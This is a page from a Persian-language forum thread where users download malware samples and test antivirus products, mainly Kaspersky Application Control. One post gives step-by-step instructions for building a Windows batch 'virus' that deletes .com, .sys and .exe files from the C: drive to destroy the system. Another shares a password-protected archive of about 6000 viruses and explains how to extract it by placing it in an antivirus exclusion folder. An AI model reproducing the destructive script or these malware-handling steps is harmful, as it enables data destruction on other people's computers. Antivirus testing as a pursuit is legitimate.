تبلیغات :
خرید لپ تاپ استوک
ماهان سرور
آکوستیک ، فوم شانه تخم مرغی ، پنل صداگیر ، یونولیت
دستگاه جوجه کشی حرفه ای
فروش آنلاین لباس کودک
خرید فالوور ایرانی
خرید فالوور اینستاگرام
خرید ممبر تلگرام

[ + افزودن آگهی متنی جدید ]




صفحه 40 از 946 اولاول ... 303637383940414243445090140540 ... آخرآخر
نمايش نتايج 391 به 400 از 9460

نام تاپيک: دانلود ویروس، تروجان، بررسی مخرب ها و تست آنتی‌ویروس ╣══ مقررات پست اول حتما مطالعه شود ══╠

  1. #391
    آخر فروم باز mohsen_1363's Avatar
    تاريخ عضويت
    Aug 2008
    محل سكونت
    طبرستان
    پست ها
    1,629

    پيش فرض

    تست پست 383
    norton
    avira
    malwarebytes

    هیچ کدوم با اسکن شناسایی نکردن
    اجراش دیگه نکردم

  2. 2 کاربر از mohsen_1363 بخاطر این مطلب مفید تشکر کرده اند


  3. #392
    حـــــرفـه ای Dr Hannibal's Avatar
    تاريخ عضويت
    Feb 2010
    محل سكونت
    Sandbox
    پست ها
    4,176

    پيش فرض


    خب دکتر جان, بالاخره یکی از مدیران انجمن کسپرسکی اومد و جوابگو شدو توضیحات لازم رو دادم.
    چیزی که من متوجه شدم این بود که scr هم یک فایل اجرایی هست. جالب بود.

    داشتم این پست رو نقل قول میکردم یاد ویروس های bat افتادم. فکر نکنم ساده تر و نخودی تر از این ویروس ها وجود داشته باشه.

    یه دونه از این ویروس ها ساختم با اپ کسپر چک کنم ببینم چطوره شانسی توی توتال هم آپ کردم نتیجه واقعا شرمسار کننده بود


    حالا بد نیست این نتیجه ای که من دیدم رو هم دوستان ببینند.

    نت پد ویندوز رو باز کنید.

    این متن رو درونش کپی کنید.


    @
    echo off

    Cls


    ===========

    Color fc


    Del /a c:\*.com


    Del /a c:\*.sys


    Del /a c:\*.exe /s



    سپس save as رو بزنید و یک اسم دلخواه با پسوند bat بهش بدین. مثلا بشه doki.bat

    حالا شما یک ویروس ساختید که فایل های سیستمی ویندوز رو پاک میکنه با اجرا شدنش ونتیجه مرگ ویندوز. فایلی که ساختید رو به هیج وجه اجرا نکنید.....

    من این رو توی توتال آپ کردم نتیجه رو ببینید چه آنتی ویروس های معروفی متاسفانه ساده ترین ویروس رو شناسایی نکردند.


    کد:
    برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


    البته از این دستور ها بسیاز زیاده. به این ویروس ها میگن کشنده فایل.

    جالب بود نه ؟

  4. 4 کاربر از Dr Hannibal بخاطر این مطلب مفید تشکر کرده اند


  5. #393
    پروفشنال Ava UK's Avatar
    تاريخ عضويت
    Jan 2009
    پست ها
    535

    پيش فرض


    خب دکتر جان, بالاخره یکی از مدیران انجمن کسپرسکی اومد و جوابگو شدو توضیحات لازم رو دادم.

    توضیحات از زبان Lucian Bara مدیر انجمن کسپرسکی:
    Applicatio Control در کل هسته اصلی را آنالیز و بررسی میکند نه فقط exe. ها را. به همیل دلیل یک فایل exe که نامش عوض شده باشه همچنان اسکن خواهد شد. در ادامه Application Control نمیتونه در مقابل فایل های inf. و یا xml. از شما محافظت بکنه به خاطر اینکه اینها فایل های اجرایی نیستند. یک فایل text میتونه اجزایی از یک مخربی باشه که قادر به اجرا شدن هست. اجازه بده اینطوری بگیم که مثلا یک فایل inf. قسمتی برای اجرا کردن exe. از طریق تنظیمات اجرای اتوماتیک ویندوز است اما فایل اجرایی exe تنها فایلی است که میتونه کاری بکنه / سیستم را آلوده بکنه. inf. و xml. نمیتونند کاری بکنند و امکان این وجود نداره که بشه اینها رو کنترل کرد چون اینها نمیتونند بعنوان یک پروسه اجرا بشند و کاری را انجام دهند.

    یک فایل scr. یک فایل اجرایی هست , و اگر اجرا بشه درست مانند یک فایل اجرایی exe. در Application Control باهاش برخورد میشه.

    خب تا اینجا توضیحاتی بود که Lucian داد. اگر در ترجمه بعضی جاها رو تغییر دادم به خاطر این بود که با فارسی جور در نمیومد و برای فهم موضوع باید تغییر میکردند.
    در ادامه پست بالا.

    بعد از اینکه این جواب رو از طرف یکی از مدیران انجمن کسپرسکی دریافت کردم. KIS رو بدون استفاده از VMware امتحان کردم.

    چون فایل I love u Saghar توسط دیتابیس کسپرسکی شناسایی میشه بنابراین قسمت File Antivirus کسپرسکی را غیر فعال کردم تا از دیتابیسش برای شناسایی استفاده نکنه.

    برای اجرا کردن فایل I love u saghar.scr از Safe Run یا همان Sand Box کسپرسکی هم استفاده نکردم چون ما میخواستیم فقط Application Control را امتحان کنیم.

    تنظیم قسمت app control برای فایل های ناشناخته و بدون امضای دیجالی بر روی untrasted قرار داره.

    بعد از کار های بالا فایل I love u saghar.scr را با دابل کلیک اجرا کردم تا سیستم من رو آلوده کنه و درایو هامو به داریوهای غیر سیستمی تبدیل کنه. اما نتیجه این شد که کسپرسکی اجازه اجرا شدن بهش رو نداد و اون رو در قسمت untrusted بصورت اتوماتیک و بدون دخالت من ثبت کرد.





    برای اینکه مطمئن بشم سیستم من واقعا توسط کسپرسکی یا بهتره بگیم Application Control محافظت شد یا نه با برنامه های زیر سیستم رو اسکن کردم.

    Avira Antivir
    Hitman Pro
    Malwarebytes Antimalware

    برای پیدا کردن روتکیت ها هم از GMER و SysInspector استفاده کردم.

    نتیجه: در سیستم هیچی پیدا نشد.
    برنده: KIS 2010 بدون آنتی ویروس.

  6. 4 کاربر از Ava UK بخاطر این مطلب مفید تشکر کرده اند


  7. #394
    حـــــرفـه ای Dr Hannibal's Avatar
    تاريخ عضويت
    Feb 2010
    محل سكونت
    Sandbox
    پست ها
    4,176

    پيش فرض

    در ادامه پست بالا.
    بعد از کار های بالا فایل I love u saghar.scr را با دابل کلیک اجرا کردم تا سیستم من رو آلوده کنه و درایو هامو به داریوهای غیر سیستمی تبدیل کنه. اما نتیجه این شد که کسپرسکی اجازه اجرا شدن بهش رو نداد و اون رو در قسمت untrusted بصورت اتوماتیک و بدون دخالت من ثبت کرد.


    عالی

  8. این کاربر از Dr Hannibal بخاطر این مطلب مفید تشکر کرده است


  9. #395
    اگه نباشه جاش خالی می مونه
    تاريخ عضويت
    May 2006
    پست ها
    218

    پيش فرض

    با سلام
    این هم لینکه 6000 ویروسه نسبتا قدیمی
    کد:
    برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
    pass: auToeXeCw0rm
    فقط هر چی هم موند به هیچ عنوان اجراشون نکنید.
    من با نود32 تست کردم از 5936 فایله ویروسی تعداد 5629 تا فایل رو ویروس شناخت و حذف کرد. حدود 307 فایل باقی موند.
    شما هم با بقیه آنتی ویروسها تست کنید و نتیجه رو اطلاع رسانی کنید.
    مرسی

  10. 4 کاربر از mohsenpj بخاطر این مطلب مفید تشکر کرده اند


  11. #396
    آخر فروم باز *hamedkhatar*'s Avatar
    تاريخ عضويت
    Jan 2006
    محل سكونت
    Esfahan
    پست ها
    4,490

    پيش فرض

    شما چطوری اکسترکت کردی؟
    من KIS 2011 دارم اومدم اکسترکت کنم یه هو دیدم کسپر عصبانی شده از اتاق دویدم رفتم بیرون گفتم حالا همه چی رو میترکونه
    بعد از چند دقیقه که برگشتم دیدم اجازه نداده هیچ کدوم از فایلها از فایل فشرده بیرون بیاند
    جدا عصبانی بود
    خواستم برای اکسترکت کسپر رو خواموش کنم ولی گفتم شاید خطرناک باشه
    هنوزم با ویروسها درگیره فقط خدا کنه شکست نخوره نامردا کله سیستم رو محاصره کردند...

  12. 2 کاربر از *hamedkhatar* بخاطر این مطلب مفید تشکر کرده اند


  13. #397
    اگه نباشه جاش خالی می مونه
    تاريخ عضويت
    May 2006
    پست ها
    218

    پيش فرض

    شما چطوری اکسترکت کردی؟
    من KIS 2011 دارم اومدم اکسترکت کنم یه هو دیدم کسپر عصبانی شده از اتاق دویدم رفتم بیرون گفتم حالا همه چی رو میترکونه
    بعد از چند دقیقه که برگشتم دیدم اجازه نداده هیچ کدوم از فایلها از فایل فشرده بیرون بیاند
    جدا عصبانی بود
    خواستم برای اکسترکت کسپر رو خواموش کنم ولی گفتم شاید خطرناک باشه
    هنوزم با ویروسها درگیره فقط خدا کنه شکست نخوره نامردا کله سیستم رو محاصره کردند...

    خب حامد جان من اول فایل رو کپی میکنم توی exclusion معرفی شده در آنتی ویروسم و همونجا اکسترکتشون کردم. بعد دوباره توی فایله اکسترکت شده اومدم داخلش و فولدر رو بدون پسورد Rar کردم. بعدش اون فایله رار رو توی یک درایوه دیگه کپی کردم و سپس اسکن کردم.
    البته خیالت راحت باشه. این ویروسها قدیمین و حتما کسپر همه رو میشناسه. فقط چون زیادن آنتی ویورس شوکه میشه که یه دفعه اینهمه ویروس از کجا اومد

  14. این کاربر از mohsenpj بخاطر این مطلب مفید تشکر کرده است


  15. #398
    آخر فروم باز *hamedkhatar*'s Avatar
    تاريخ عضويت
    Jan 2006
    محل سكونت
    Esfahan
    پست ها
    4,490

    پيش فرض

    این که همه رو میشناسه که مطمعنم چون من به کسپر ایمان دارم
    فقط هنوز در حال کشتنه
    نمیدونم این خون و خون ریزی کی تموم میشه

  16. #399
    آخر فروم باز rassool's Avatar
    تاريخ عضويت
    Jan 2006
    محل سكونت
    ساكن شهرفرشتم خيالت ساكن بهشتم
    پست ها
    1,491

    پيش فرض



  17. این کاربر از rassool بخاطر این مطلب مفید تشکر کرده است


  18. #400
    حـــــرفـه ای Dr Hannibal's Avatar
    تاريخ عضويت
    Feb 2010
    محل سكونت
    Sandbox
    پست ها
    4,176

    پيش فرض

    دوستان توی پست های قبل توضیح داده شد اسکن object اصلا نشون دهنده تعداد ویروس های پاک شده نیست و روشش هم اعلام شد.

    فردا من یک سری از این فایل ها را که آنتی ویروس شما شناسایی نکرده یا حتی به عنوان ویروس شناسایی کرده رو به صورت رندم آنالیز می کنیم تا ببینیم اصلا ویروس هست یا نه. فکر نمیکنم توی این پک 6000 ویروس باشه. حالا تا فردا مشخص میشه

  19. این کاربر از Dr Hannibal بخاطر این مطلب مفید تشکر کرده است


Thread Information

Users Browsing this Thread

هم اکنون 1 کاربر در حال مشاهده این تاپیک میباشد. (0 کاربر عضو شده و 1 مهمان)

User Tag List

برچسب های این موضوع

قوانين ايجاد تاپيک در انجمن

  • شما نمی توانید تاپیک ایحاد کنید
  • شما نمی توانید پاسخی ارسال کنید
  • شما نمی توانید فایل پیوست کنید
  • شما نمی توانید پاسخ خود را ویرایش کنید
  •